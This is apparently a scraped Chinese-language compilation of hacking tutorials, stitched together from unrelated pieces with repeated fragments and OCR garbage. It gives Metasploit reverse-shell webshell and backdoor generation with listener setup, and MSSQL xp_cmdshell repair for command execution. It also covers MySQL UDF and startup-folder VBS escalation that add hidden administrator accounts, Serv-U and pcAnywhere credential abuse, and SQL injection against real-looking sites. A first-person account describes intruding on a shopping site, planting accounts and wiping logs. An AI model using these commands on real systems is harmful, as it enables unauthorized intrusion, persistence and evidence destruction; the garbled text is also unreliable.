利用Metasploit进行Linux提权
本文所涉及的方法只能在已授权的机器上做测试。Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用。下面是具体的利用方法。我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:产生webshellmsfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp然后将此webshell上传到服务器(这个步骤要有上传权限。)然后启动msfconsole输入use exploit/multi/handler,set PAYLOAD windows/meterpreter/reverse_tcp(这里的payload要和前边的msfpayload所使用的一样。)set LHOST your_ipexploit然后访问webshell的url,这里使用curl 访问curl http://host/webshell.asp ,如果exploit执行成功的话就可以看到msfconsole中有返回meterpreter shell。但是我使用netbox 搭建asp环境老是执行出错,希望读者在实际验证不出错后再使用。这里产生的是asp的webshell 也
可以产生php webshell,jsp webshell 需要在msfencode 时用-t 参数指定脚本类型,我认为php类型的webshell更容易成功。另外如果获取服务器拥有可以上传并且执行上传文件的权限的话,可以上传一个msfpayload产生的后门,设置监听,然后执行后门,返回一个session然后将session 转为meterpreter,这样就可以方便的使用meter各种特性了。给个步骤:(前提在上边以及说明了)1、msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.130.131 LPORT=4444 X
>/root/helen.exe2、打开msfconsole (另外开一个terminate终端)3、设置监听(监听这个词好像很高级,别被它吓到):use exploit/multi/handler,set PAYLOAD windows/meterpreter/reverse_tcp,set LHOST=your_ip,set LPORT 4444,执行exploit4、将test.exe 上传到服务器5、在服务器上执行test.exe 就可以返回一个shell了。6、将windows shell 转成meterpreter shell:由于使用的payload是shell_reverse_tcp,看名字就知道了返回一个shell,可以在监听器看到返回了一个windows shell (windows 命令提示符),而不是一个meterpreter shell,这样就要转换了,方法是按下Ctrl + z 使windows shell 后台运行,然后sessions 指令查看shell 的session是多少,然后执行sessions -u number(number为你找到的
windows shell session号。这样就产生了一个meterpreter shell,可以利用meterpreter强大的功能。也有可能出错,仔细看出错信息然后复制其一部分google一下。可能读者些疑问:既然可以在上传执行exe文件,为什么要用msf 呢,直接上传一个强大木马不是更方便么。我想说因为msf 中有个强大的Meterpreter。总结,可以发挥想象,挨个试试payloads有的payloads 不能用,也许有意外的发现。当LINUX提权反弹不了时.经常遇到这种情况请出MSF ..1 .生成WEBSHELL文件msf > msfpayload
php/reverse_php LHOST=你的IP LPORT=端口R > dis9.php我的BT4是在/ROOT/ 目录然后吧dis9.php加才能运行把dis9.php传进你的SHELL里例如
https://www.doczj.com/doc/cb13512180.html,/dis9.php2 . 然后MSF设置接口模板和参数msf > use multi/handler //进入multi/handler 接口msf exploit(handler) > set PAYLOAD php/reverse_php //写入模块不清楚的可以先info php/reverse_php 看看介绍msf exploit(handler) > set LHOST 你的IP //生成
dis9.php的LHOST的IP 也就是你的IP 要一样msf exploit(handler) > set LPORT 8080 //同上msf
exploit(handler) > exploit //执行3.反弹SHELL然后访问你的dis9.phproot@bt4:https://www.doczj.com/doc/cb13512180.html,/dis9.php这样就会反弹一个SHELL我们就可以继续FUCK
ALL/////////////////////////////////////////////////////////////////////////////////////// //////////JSPmsfpayload java/jsp_shell_reverse_tcp
LHOST=192.168.10.1 R > balckrootkit.jspmsf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcpset PAYLOAD
java/jsp_shell_reverse_tcpmsf exploit(handler) > set LHOST 192.168.10.1LHOST =>
192.168.10.1——————————————————-这里没SET端口默认的4444
WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere 密码,登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法! 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过
Metasploit渗透测试实例分析 摘要:随着信息技术的飞速发展,信息安全的概念也在逐步深入人心。为了更好的保护用户信息,提高系统的安全性,渗透测试技术应运而生。简而言之,渗透测试就是模拟黑客的技术手段去检测系统的安全性。 本文选择 Metasploit 渗透测试框架为平台,阐述了Metasploit框架的内容,详细讲解了不同界面下 Metasploit 渗透框架的使用方法,详细讲解了Metasploit的所用功能和参数。然后,本文以实际操作为基础,讲解怎样通过查找的漏洞进行对目标主机攻击来获得Meterpreter shell。成功获取Meterpreter shell之后就可以通过Metasploit一些基本的命令来收集更多的信息,以便达到对目标主机的长期控制和不被用户察觉。 关键词:渗透;Metasploit;Meterpreter shell。 Metasploit penetration testing example analysis Abstract:With the rapid development of information technology, information security is gradually becoming more popular. In order to protect user information and to improve system security, penetration testing techniques have emerged. In short, penetration testing is a technology that simulates the means of hackers to check the security of a system. Paper chooses Metasploit penetration testing framework as a platform to explain the contents of the Metasploit Framework, a detailed account of the use of different interfaces under the Metasploit penetration framework Metasploit explained in detail by using the function and parameters. Then, the paper-based practice, explain how to find loopholes through the target host attack to get Meterpreter shell. After successfully obtaining Meterpreter shell can to collect more information through Metasploit some basic commands in order to achieve long-term control of the target host and are not aware of the user. Key words:permeation;Metasploit;Meterpreter shell.
1433端口提权的过程 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.doczj.com/doc/cb13512180.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上
传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西
前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗。其实在sa权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧) 下面来说sa下执行命令错误的几种情况: 1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。) 这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。 第一步 exec sp_dropextendedproc 'xp_cmdshell' (这个命令就是删除原有的cmdshell,因为已经出错了) 第二步 dbcc addextendedproc (“xp_cmdshell”,“c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll”) ;EXEC sp_configure 'show advanced options', 0 – 当然这是sql命令,用查询分析器执行。第二步里的c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径,这个路径是比较常见的,如果c盘没有可以找找其他盘符。 2、无法在库xpweb70.dll 中找到函数xp_cmdshell。原因:127(找不到指定的程序。) 其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。 3、未能找到存储过程‘masterxpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc
Metasploit详解详细图文教程 1. 一、metasploit简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。 这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的shellcode ,并且不断更新。 目前的版本收集了数百个实用的溢出攻击程序及一些辅助工具,让人们使用简单的方法完成安全漏洞检测,即使一个不懂安全的人也可以轻松的使用它。当然,它并不只是一个简单的收集工具,提供了所有的类和方法,让开发人员使用这些代码方便快速的进行二次开发。 其核心中一小部分由汇编和C语言实现,其余由ruby实现。不建议修改汇编和C语言部分。1. 二、搭建metasploit环境 Windows环境下安装。 从官方网站https://www.doczj.com/doc/cb13512180.html,/下载windows版本的安装版,直接安装即可。安装的版本是3.5.1。安装时需要注意以下两点: 1. 在安装的时候要关闭杀毒软件。否则的话会导致杀毒软件和metasploit 冲突,导致安装失败。 2. 在控制面版——区域和语言选项——选择英文(美国)——高级选项卡中 选择英文(美国)。因为在安装的时候,会进行检测,如果属于非英文 地区会导致安装失败。 如果安装有杀毒软件,会经常提示在metasploit的安装目录下检测到病毒或木马。
授渔之<一次1433端口提权的过程> 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.doczj.com/doc/cb13512180.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上
传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西
Metasploit 目录 一、metasploit简介 (1) 二、搭建metasploit环境 (1) 三、metasploit的使用 (2) 四、Metasploit攻击方法分类 (3) 五、Metasploit架构 (4) 六、Metasploit二次开发方法 (6) 七、安全软件常用检测方法 (6) 八、Metasploit反检测方法 (7) 九、一般攻击的过程 (7) 十、恶意软件分类 (8) 十一、exploits详细解析之proftp_telnet_iac.rb (8) 一、metasploit简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。 这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。 目前的版本收集了数百个实用的溢出攻击程序及一些辅助工具,让人们使用简单的方法完成安全漏洞检测,即使一个不懂安全的人也可以轻松的使用它。当然,它并不只是一个简单的收集工具,提供了所有的类和方法,让开发人员使用这些代码方便快速的进行二次开发。 其核心中一小部分由汇编和C语言实现,其余由ruby实现。不建议修改汇编和C语言部分。 二、搭建metasploit环境 Windows环境下安装。 从官方网站https://www.doczj.com/doc/cb13512180.html,/下载windows版本的安装版,直接安装即可。安装的版本是3.5.1。安装时需要注意以下两点: 1在安装的时候要关闭杀毒软件。否则的话会导致杀毒软件和metasploit冲突,导致安装失败。 2在控制面版——区域和语言选项——选择英文(美国)——高级选项卡中选择英文(美国)。因为在安装的时候,会进行检测,如果属于非英文地区会导致安装失败。
Metasploit 渗透未打补丁的windows 2003 server 教程 演示之前,我先介绍一下演示的环境配置:使用Vware10.0构建两个虚拟机,分别采用kali-linux和windows 2003 server sp3操作系统,宿主机操作系统是windows 7。首先将windows 2003 server sp3 虚拟机作为被渗透的目标机,IP地址为192.168.1.103;kali-linux虚拟机作为攻击机,IP地址为192.168.1.2。之所以选择kali-linux系统作为攻击机,是因为其本身就是黑客最常用攻击的平台,系统整合了许多用于攻击的程序。Kali-linux系统界面如下图1所示。靶机windows2003server sp3 系统如图2 所示。 图1 目标主机的截图
图2 首先,在kali-linux系统终端运行:service postgresql start和service metasploit start 两个命令,其中前者是开启SQL数据库服务的命令,后者是运行metasploit渗透测试框架程序的命令。如图3所示,表明服务运行成功。接着在终端输入msfconsole命令,运行metasploit 命令行程序,程序运行成功。如图4所示。 开启服务
图3 运行msfconsole 图4 由于windows 2003 server 是微软应用最广泛的企业级操作系统之一,这次我们针对其netapi32.dll漏洞进行渗透。至于为什么会针对此漏洞进行渗透,是因为通过前期大量的扫描获得了主机存在这个漏洞信息,这些工作不在此次演示范围,在此忽略。 第二步,运行search netapi 命令搜索netapi,在metasploit框架中列出所有与netapi相关的漏洞利用代码。如图5所示。
关于mysql提权方法总结 mysql是一种开放源代码的关系型数据库管理系统(rdbms),mysql数据库系统使用 最常用的数据库管理语言--结构化查询语言(sql)进行数据库管理。那么对于mysql提权的方法,站长们是否了解呢?专职优化、域名注册、网站空间、虚拟主机、服务器托管、vps 主机、服务器租用的中国信息港在这里为你做深入探讨! mysql提权总结方法四则 一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: 1 create function cmdshell returns string soname 'udf.dll' 2 select cmdshell('net user iis_user 123!@#abcABC /add'); 3 select cmdshell('net localgroup administrators iis_user /add'); 4 select cmdshell('regedit /s d:\web\3389.reg'); 5 drop function cmdshell; 6 select cmdshell('netstat -an'); 二 VBS启动项提权 1 create table a (cmd text); 2 insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 3 insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " ); 4 insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " ); 5 select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动 \\a.vbs"; 先在webshell里连接上数据库,建立表,将VBS写入表里,然后导入启动项, 如果UDF提权不行的话也可以尝试下这个方法,前提是要有ROOT权限,后面有个,0表示不弹出CMD窗口,安静的运行。 还可以这样写: 1 create table a (cmd BLOB); 2 insert into a values (CONVERT(木马的 16进制代码,CHAR)); 3 select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe' 4 drop table a; 执行前3条语句,就可以将木马写进启动里了,前提是木马一定要是16进制,还有就是路径要是\\,因为windows会自动过滤掉一个\
获得网站WEBSHELL权限 一、学习目标:在得到了管理员帐号的情况下,进入网站的管理员后台,以备份数据库得到WEBSEHLL。 二、知识要点:在入侵网站之前,信息搜集是第一步,任何情况的搜集,当情况搜集有初步成果之后,应该首先试图获得管理员的帐号和密码,然后找出网站的后台(看管理员在后台的什么地方),对于现成的整站系统而言,通常后台是固定的,只要搞到网站就能以管理员的帐号进入。进了后台,就有了能力对网站进行操作,我们就有了很大的把握获得的一个WEBSEHLL。所谓WEBSEHLL,也就是一个脚本,这个脚本,具有可以管理WEB、修改主页内容的权限,如果要修改别人的主页,一般都需要这个权限(上传漏洞要得到的也是这个权限)。它可对网站的任何文件进行编辑,移动,复制,删除。如果某个服务器权限设置得不好,那么通过webshell可以得到该服务器的最高权限----即可以得到的是整个网站的操作权限,并且是进一步渗透获得主机权限的立脚点。 在进入管理后台后,获得WEBSHELL的首选方法是通过"备份数据库"的方法上传一个扩展名改成GIF的ASP木马,(之所以要把ASP的木马护展名由ASP改为GIF,是因为一般网站都有检测护展名,当检测到护展名为ASP时就不会允许上传),上传之后,用备份数据库的办法,把GIF护展名,备份成为ASP护展名,然后连接备份后的ASP地址,就能打开你上传的ASP木马,一个WEBSEHLL就到手了。具体方法为在备份数据库地址里输入你上传的GIF文件的相对地址,在恢复地址里输入你要生成的ASP地文件的路径和文件名,然后恢复数据库即可。 三、实验步骤 1、IE浏览器中输入https://www.doczj.com/doc/cb13512180.html,/bbsxp1(之前已经通过某方法得到网站后台管理员的用户名、口令)。 (1)以管理员身份登录网站前台,如图1。 图1 (2)在图2界面中进入ACCESS数据库管理,并在图3界面中输入后台管理员密码完成登录。
说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ 嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 第一 如果服务器上有装了pcanywhere服务端,管理员为了管理方便 也给了我们方便,到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 破解就使用pcanywhere连接就ok了 第二 有很多小黑问我这么把webshell的iis user权限提升 一般服务器的管理都是本机设计完毕然后上传到空间里, 那么就会用到ftp,服务器使用最多的就是servu 那么我们就利用servu来提升权限 通过servu提升权限需要servu安装目录可写~ 好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限 然后去servu安装目录里把ServUDaemon.ini更换服务器上的。 用我新建的用户和密码连接~ 好的,还是连上了 ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //刚才添加的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。 如果提示没有权限,那我们就 把后门(server.exe)传他system32目录 然后写一个VBs教本 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user user pass /add",0) b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) b=wshshell.run ("cmd.exe /c server.exe",0)
基于Metasploit利用GHOST 漏洞获得远程Exim邮件服务器SHELL 分析阶段 1.GHOST漏洞分析及其条件限制 2.如何利用受GHOST漏洞影响的Exim服务的原理 实际操作阶段 1.渗透环境搭建:KaliLinux与Metasploit 2.使用Nmap对目标进行端口扫描及服务查点 3.快速检查被渗透目标是否存在ghost漏洞 4.使用Metasploit加载GHOST漏洞攻击模块进行远程入侵,获得远程主 机shell ========= 分析开始 ========= GHOST漏洞分析及其条件限制 GHOST漏洞是2015年1月27号公布的Linux底层漏洞,国际编号为CVE-2015-0235,存在于GNU C库(glibc)中,受影响的Linux发现版本有:Debian 7 (wheezy),Red Hat Enterprise,Linux 6 & 7,CentOS 6 & 7,Ubuntu 12.04等。 存在漏洞的函数__nss_hostname_digits_dots()由glibc的非重入版本的文件:
nss/getXXbyYY.c,以及重入版本:nss/getXXbyYY_r.c提供。然而,这个函数的调用是由#ifdef HANDLE_DIGITS_DOTS来定义的,这个宏定义只在这几个文件有: - inet/gethstbynm.c - inet/gethstbynm2.c - inet/gethstbynm_r.c - inet/gethstbynm2_r.c - nscd/gethstbynm3_r.c 以上这些文件实现gethostbyname*()函数族,因此也只有它们会调用__nss_hostname_digits_dots(),并且可能触发它的缓冲区溢出。该函数的作用是:“如果主机名是IPv4/IPv6地址,就跳过费时的DNS查找”。 glibc-2.17的代码如下: 35 int 36 __nss_hostname_digits_dots (const char *name, struct hostent *resbuf, 37 char **buffer, size_t *buffer_size, 38 size_t buflen, struct hostent **result, 39 enum nss_status *status, int af, int *h_errnop) 40 { .. 57 if (isdigit (name[0]) || isxdigit (name[0]) || name[0] == ':') 58 { 59 const char *cp; 60 char *hostname; 61 typedef unsigned char host_addr_t[16]; 62 host_addr_t *host_addr; 63 typedef char *host_addr_list_t[2]; 64 host_addr_list_t *h_addr_ptrs; 65 char **h_alias_ptr; 66 size_t size_needed; .. 85 size_needed = (sizeof (*host_addr) 86 + sizeof (*h_addr_ptrs) + strlen (name) + 1); 87 88 if (buffer_size == NULL) 89 { 90 if (buflen < size_needed) 91 { .. 95 goto done;
1网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境, 包括如图1所示的运行Kali Linux 系统的计算机,如图2所示的Windows Server 2003系统的计算机和如图 3所示的运行 Windows 7系统的计算机。显然这三台计算机处于同一个网段中, 可以相互通讯,Kali 系统用作攻击机,下面将在此系统上运行 Metasploit 进行 渗透测试,而 Windows 2003和Windows 7系统都是本次任务中需要进行渗透入 图1 Kali 攻击机 侵的靶机,保持安装后的默认状态,没有打额外的系统安全补丁。 root Mlflj 2 Ki3) f 厂 mine: 0 carrie 『;3 F 叽 r-1j 3 kA 丄PM AppLitutlgin 兮 PLic 砂常 l*-l Link enc ap r Lor al L 二口pback Irwt 1 LmtB add r i : :1/12B UP LOOPBACK RUNNING packets : 32 归「厂口 [厂石 TX packets : 32 er rars RX fl -4 IFcanflg Llrik anc4p :EThemQt HWidek ftG L G C .29^30:25: fl inot addr-l :0_] 0.10.13? Beast 11?. 10.13.255 貼 Lnatfi addn fgfid r 1513c = 29f f : fofifli:25t 1/^4 JScjppa : I UP BROADCAST HUftNI^G MULHC4ST hlTU:垢舲 Moir R H pKket§: 136S7 errors:? repped :9 ovtrnjri9:9 IM packets :2S£I 92 e r r : rs:& d repp^d : G overnjfisM3 c oil 丄^icns : D t Kqdfi je L 色n :1 HUJ X J ftH b>T?:9U9JS {?Q,5 Kim TK b/tH :117672Lfi Hwle 苦乩(L0卫 Stope: Hast MTU: 655 3S Metric:! i z B dropped ; 3 o^erruriB : 0 i :0 dropped :fl overruns :A :? _ ilo fc&i Via^r Sajieh T 之前由于不会安装vm版的bt5而在网上求救,结果认识了一找不到片的基友,00后的,,感觉顿时无语了…………聊天时,他说sqlmap 和burpsuite都很强大…………玩完sqlmap后,就一直想学burpsuite来着,,但是一直都没学,这几天才刚开始完的…………感觉确实强大,能够拦截,查看和修改网站流量………………不废话,开始 目标站,https://www.doczj.com/doc/cb13512180.html,(不要问我怎么找的……百度高级搜索inurl:asp?id=XX) 点一链接,在网站后加 and 1=1 回车,页面正常,,加and 1=2 ,回车,不正常,,,判断存在sql 注入漏洞(当然存在啊,不然怎么做教程,只是说下如何判断注入) 然后order by 查询字段(是叫做字段吗,我对概念不清楚,虽然我为这还自学了mysql……暂且叫字段吧) 如图,12不正常,11正常,说明字段为11(11之前的都正常) 然后在地址后加入 union select 1,2,3,4,5,6,7,8,9,10,11 from admin,也就是访问 https://www.doczj.com/doc/cb13512180.html,/show_content.asp?id=1361 union select 1,2,3,4,5,6,7,8,9,10,11 from admin(别问我admin哪来的,,微软access数据库默认的表,也不能说是默认的吧,大多都是这样,下面的username和password也是这样),看图吧 看到2 3 没,爆出查询点了,,把2换成username,3换成password(当然2换成password,3为username也行),回车,如图 username为admin,,密码为MD5加密的值,拿去解密,如图 Metasploit Framework命令汇总一、msfconsole ? 帮助菜单 back 从当前环境返回 banner 显示一个MSF banner cd 切换目录 color 颜色转换 connect 连接一个主机 exit 退出MSF help 帮助菜单 info 显示一个或多个模块的信息 irb 进入irb脚本模式 jobs 显示和管理作业 kill 杀死一个作业 load 加载一个插件 loadpath 在一个路径搜索并加载模块 quit 退出MSF resource 运行存储在一个文件中的命令 route 查看一个会话的路由信息 save 保存动作 search 搜索模块名和描述 set 给一个变量赋值 setg 把一个值赋给全局变量 show 显示所给类型的模块,或所有模块 sleep 在限定的秒数内什么也不做 unload 卸载一个模块 unset 解除一个或多个变量 unsetg 解除一个或多个全局变量 use 通过名称选择一个模块 version 显示MSF和控制台库版本号 二、database db_add_host 添加一个或多个主机到数据库 db_add_note 添加一个注释到主机 db_add_port 添加一个端口到主机 db_connect 连接一个存在的数据库 db_create 创建一个新的数据库实例 db_del_host 从数据库删除一个或多个主机 db_del_port 从数据库删除一个端口 db_destroy 删除一个存在的数据库 db_disconnect 断开与当前数据库实例的连接 db_driver 指定一个数据库驱动 db_hosts 列出数据库中的所有主机 . 一次简单但又完整的先拿shell后提权的经历 前一段时间看到了易趣购物网站爆出了注入漏洞,注入的关键字是关键字: inurl:Price.asp?anid=,结合系统本身的后台数据库备份生成目录可以自定义漏洞,轻松可以通过备份xxx.asp的目录,然后上传后缀为jpg的一句话木马,菜刀连之即可得到shell。 但是如果是这样我也不会再写此文,在这些购物网站中,数据最重要的当属减肥丰胸等等网站数据,而且这些网站在优化seo时,肯定设置的关键字也是减肥丰胸之类,那么中文标题之中必有此关键字,那我的想法就产生了,我的新的注入关键字产生了nurl:Price.asp?anid= intitle:减肥。 啊d扫描注入点,找到一个注入点https://www.doczj.com/doc/cb13512180.html,/Price.asp?anid=xxx,拿去跑表段字段即可,不过也得注意表段是特有的Cnhww。我一般在渗透的时候,也会用jsky和御剑检测站点,在我查看御剑的结果时发现了一个让我欣喜的结果https://www.doczj.com/doc/cb13512180.html,/shell.asp,明白的一看便知是先人后门,打开发现是一个小马, (原有小马一被我清除,此图是后来补的),复制大马代码保存,即得到shell。 扫描端口发现,网站开启了 连接3389端口发现可以连接, 尝试简单的命令猜解失败后,决定重新利用shell。查看服务器所支持的组件: 发现可以支持fso和wscript.shell,欣喜往外,ipconfig,net user都支持,查看了当前的账户,有一个默认的administrator管理账户。但是net user admin admin /add,没任何反应,net user 发现并没有添加账户成功,这里很纳闷,决定换思路。把网站翻了个遍,发现了一个数据库的链接文件。 通过代码可知,这里数据库使用了acess和mssql两个,mssql数据库连接账号和密码都已知晓,何不利用数据库连接器试一试,然后兴奋的分别用了MSSQL连接器、SQLTools、SQL查询分析器分离版本,但皆以失败而告终,都拒绝连接不上,看来是防火墙对1433端口做了从外到内的限制,悲哀。。。 就在这个时候,忽然想起来,啊d等软件在mssql数据库sa权限下,皆有列目录和执行dos的权限,何不试试,然后用啊d 执行命令net user admin admin /add & net localgroup administrators admin /add,但是好久都没回显,很卡的样子,就又换了hdsi,一举成功。 注意这里建立admin是为了方便检测新否已经建立账户,要做一个好的后门,是要做克隆账户的。心情愉悦的3389连之,为了防止管理员net user查到新建的账户,我建立了隐藏账户,即是admin$,这种账户在cmd中时发现不了的,但是查询用户组还是一览无遗。我当时没在意觉得没什么,然后速度在日志查看器中删除了所有日志,(这个我也不想,不过好似没法删除单一的登陆记录,请大牛指点指点),正在这时,忽然事件查看器中多了一条登录审核信息,我一看管理员来了,吓得我急忙注销电脑,灰溜溜的跑了。。。。 大约过了1个小时吧,我又重新登录,账号还在,管理员确实很马虎额,不过自己可不能再大意了,遂决定建立克隆账户。 然后就用shell上传aio.exe文件,竟然失败,然后用菜刀上传也是失败,真是无语。看来是权限不够,忽然想到3389现在不是支持复制粘贴吗?忽然觉得思路就是被逼出来的, ### 提权技巧 1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是https://www.doczj.com/doc/cb13512180.html, cmd.txt cmd.rar等 https://www.doczj.com/doc/cb13512180.html, user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上 传一个net.exe 3.cmd执行exp没回显的解决方法:com路径那里输入exp路径 C:\RECYCLER\pr.exe,命令那里清空(包括/c )输入net user jianmei daxia /add 